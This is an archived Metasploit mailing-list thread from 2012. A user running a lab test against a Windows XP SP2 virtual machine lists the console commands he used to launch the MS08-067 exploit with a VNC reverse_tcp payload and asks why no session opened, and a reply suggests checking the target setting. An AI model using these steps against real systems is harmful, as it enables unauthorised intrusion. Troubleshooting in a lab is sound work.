Metasploit mailing list archives

Re: hi all simple exploit of taking reverse_tcp is giving error, need to know where i am making mistake


From: haZard0us <hazard0us.pt () gmail com>
Date: Sat, 11 Feb 2012 17:17:13 +0000

msf (exploit) > show targets

This issue happened to me while ago and was that the problem: not the right target.

Cheers \o/

Em 11-02-2012 17:14, jambunathan sadasivamiyer escreveu:
hi

thanks to team, who responded me immediately ,

I am also try to work with community edition of metasploit

i am trying to use metasploit community edition for performing simple exploit with vm target XP-SP2

with gui of community edition , i tried creating project, assigning target IP, and option to import from nessus file .
further i couldnot see any thing in gui.

but i am continuing with command based options to understand more.i used metasploit pro console thats come along with community edition

following command  i used
msf > db_status

postgresql connected to msf3

                          msf > search ms08-067
                          msf> use exploit/windows/vncinject/reverse_tcp

it succeeded
then i gave
                          msf > set RHOST target ip
                          msf > set LHOST host ip
                          msf > LPORT 4444
                          msf > show options

it gave me what i have assigned for Rhost and Lhost

                          msf> choosed the payload
                          msf> ...(exploit...)> exploit
exploit executed successfully, but,i couldnot get the reverse tcp of VNC

Can any body tell me where i a making mistake

thanks with regards
jam



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: